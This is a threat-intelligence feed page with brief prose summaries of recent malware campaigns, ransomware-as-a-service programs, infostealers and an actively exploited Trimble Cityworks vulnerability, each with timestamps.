LATEST THREAT INTELLIGENCE.
SVC New Stealer on the Horizon
Description: SvcStealer 2025 is a newly discovered information stealer malware distributed through spear phishing emails. It targets sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and harvests data from various sources. It compresses the collected information and sends it to a command and control server. The malware can also download additional payloads and implements evasion techniques. It targets multiple browsers, messaging applications, and specific file types. The campaign was observed in late January 2025, with the threat actors potentially selling the stolen data on underground forums and marketplaces.
Created at: 2025-03-21T18:47:00.218000
Updated at: 2025-03-24T13:44:53.692000
VanHelsing: New RaaS in Town
Description: VanHelsing RaaS, a new ransomware-as-a-service program launched on March 7, 2025, has quickly gained traction in the cybercrime world. With a low $5,000 deposit for affiliates, it offers an 80% cut of ransom payments. The service provides a user-friendly control panel and targets multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems. Within two weeks of its launch, VanHelsing infected three victims, demanding large ransoms. The ransomware, written in C++, is actively evolving, with two variants discovered just five days apart. It employs various techniques to evade detection, including a 'Silent' mode and selective encryption of files. The rapid growth and sophistication of VanHelsin gRaaS highlight the increasing threat of ransomware attacks.
Created at: 2025-03-23T15:40:51.431000
Updated at: 2025-03-24T13:38:17.277000
Lumma Stealer Malware Thrives as Unique Patterns Uncovered in the Infostealer's Domain Clusters
Description: Recent research reveals Lumma Stealer command and control domain clusters share specific technical characteristics, enabling mapping of entire infrastructure clusters. The infostealer's logs are being shared for free on Leaky[.]pro, a new hacking forum, offering billions of stolen credential records. There's an alarming increase in malware spread via malicious YouTube links and infected files disguised in videos, comments, or descriptions. Lumma Stealer infections typically enable more extensive attacks, including ransomware deployment and espionage operations. The malware targets multiple Windows versions, stealing sensitive information like login credentials, browser data, chat logs, and cryptocurrency wallet details. Distribution methods include malvertising on popular search engines and malspam with harmful attachments. Threat actors register clusters of 10-20 domains at a time, some used immediately while others age for up to two weeks.
Created at: 2025-02-22T00:33:07.065000
Updated at: 2025-03-24T00:02:52.734000
LightSpy Malware Now Targets Facebook & Instagram Data
Description: LightSpy, a modular surveillance framework, has expanded its capabilities to target Facebook and Instagram data. The malware, initially focused on mobile devices, now compromises Windows, macOS, Linux, and routers. Recent analysis reveals a significant expansion in its command list, with over 100 commands spanning multiple platforms. New Android commands specifically target Facebook and Instagram database files, potentially allowing attackers to collect private messages, contact lists, and account metadata. The infrastructure analysis uncovered previously unreported components, including a core version dated 2021-12-31. Windows plugins focus on keylogging, audio recording, video capture, and USB interaction. The exposure of admin panel authentication endpoints provides insights into the malware's operational framework.
Created at: 2025-02-21T15:28:00.106000
Updated at: 2025-03-23T15:02:20.895000
Targeting of freelance developers
Description: North Korea-aligned cybercriminals are targeting freelance software developers through fake job offers and coding challenges containing malware. The campaign, dubbed DeceptiveDevelopment, uses two main malware families - BeaverTail and InvisibleFerret - to steal cryptocurrency wallets and login credentials. Attackers pose as recruiters on platforms like LinkedIn and GitHub, providing trojanized projects as part of fake interview processes. The malware steals browser data, cryptocurrency wallets, and system information, and can deploy remote access tools. Hundreds of victims globally have been observed across Windows, Linux and macOS systems. The operation shows increasing sophistication and is expected to continue evolving its tactics to target cryptocurrency users.
Created at: 2025-02-21T05:58:33.035000
Updated at: 2025-03-23T05:00:15.187000
BlackBasta ransomware
Description: Members of the Conti ransomware group appear to have splintered into multiple threat groups including BlackBasta, which has become one of the most significant ransomware threats. ThreatLabz has observed more than five victims that have been compromised by BlackBasta 2.0 since the new version’s release in mid-November 2022. This demonstrates that the threat group is very successful at compromising organizations and the latest version of the ransomware will likely enable them to better evade antivirus and EDRs.
Created at: 2022-12-02T12:22:12.999000
Updated at: 2025-03-23T00:03:10.218000
Stately Taurus Activity in Southeast Asia Links to Bookworm Malware
Description: Unit 42 researchers have discovered connections between Stately Taurus, a threat actor targeting ASEAN countries, and the Bookworm malware family. Analysis of infrastructure and code overlaps revealed links between recent Stately Taurus attacks and Bookworm samples dating back to 2015. The group has been using both Bookworm and ToneShell malware in their operations. Bookworm has undergone minimal changes since 2015, demonstrating its versatility and continued effectiveness. The malware's modular design allows for flexible packaging to meet operational needs. Stately Taurus is expected to continue developing and utilizing Bookworm in future attacks targeting Southeast Asian organizations.
Created at: 2025-02-20T19:47:44.548000
Updated at: 2025-03-22T19:01:55.704000
Demystifying PKT and Monero Cryptocurrency deployed on MSSQL servers
Description: This analysis examines a recent cryptocurrency mining operation targeting MSSQL servers, focusing on PKT Classic and Monero cryptocurrencies. The attack exploits vulnerabilities to deploy mining tools, including PacketCrypt for PKT and XMRIG for Monero. The process involves using Windows utilities and PowerShell scripts to download and execute malicious files. The miners consume significant system resources, potentially degrading performance and causing hardware wear. The attackers utilize GitHub repositories, obfuscation techniques, and multi-stage attacks to evade detection. The article provides details on the attack chain, wallet information, and file analysis, highlighting the sophisticated nature of the operation. Mitigation strategies include regular software updates, strong authentication measures, and robust antivirus protection.
Created at: 2025-02-20T13:44:21.193000
Updated at: 2025-03-22T13:01:31.822000
Evolving Snake Keylogger Variant
Description: A new variant of Snake Keylogger, identified as AutoIt/Injector.GTY!tr, has been detected by FortiSandbox v5.0. This malware has attempted over 280 million infections, primarily targeting China, Turkey, Indonesia, Taiwan, and Spain. Snake Keylogger steals sensitive information from popular web browsers by logging keystrokes, capturing credentials, and monitoring the clipboard. It exfiltrates data to its command-and-control server using SMTP and Telegram bots. FortiSandbox's advanced AI engine, PAIX, detected the malware through static and dynamic analysis, revealing its use of AutoIt for obfuscation, process hollowing techniques, and persistence mechanisms. The keylogger also employs specialized modules to steal credit card details and leverages the SetWindowsHookEx API for keystroke capture.
Created at: 2025-02-20T08:49:08.190000
Updated at: 2025-03-22T08:00:57.500000
Trimble Cityworks: CVE-2025-0994: Active Exploitation
Description: A high-severity deserialization vulnerability in Trimble Cityworks, CVE-2025-0994, affects versions before 15.8.9 and Office Companion versions before 23.10. This flaw allows authenticated attackers to execute remote code on Microsoft IIS web servers. Exploitation indicators suggest the use of Rust-based loaders to deploy VShell and Cobalt Strike. Malicious files, including obfuscated JavaScript and executables, were likely downloaded from Cobalt Strike C2 servers. Shodan reveals 111 exposed Cityworks instances, with 21% vulnerable. The majority are in the US, including .gov domains. Organizations are urged to upgrade to patched versions immediately, as CISA has added this CVE to their Known Exploited Vulnerabilities Catalog.
Created at: 2025-02-20T02:49:24.532000
Updated at: 2025-03-22T02:01:39.509000
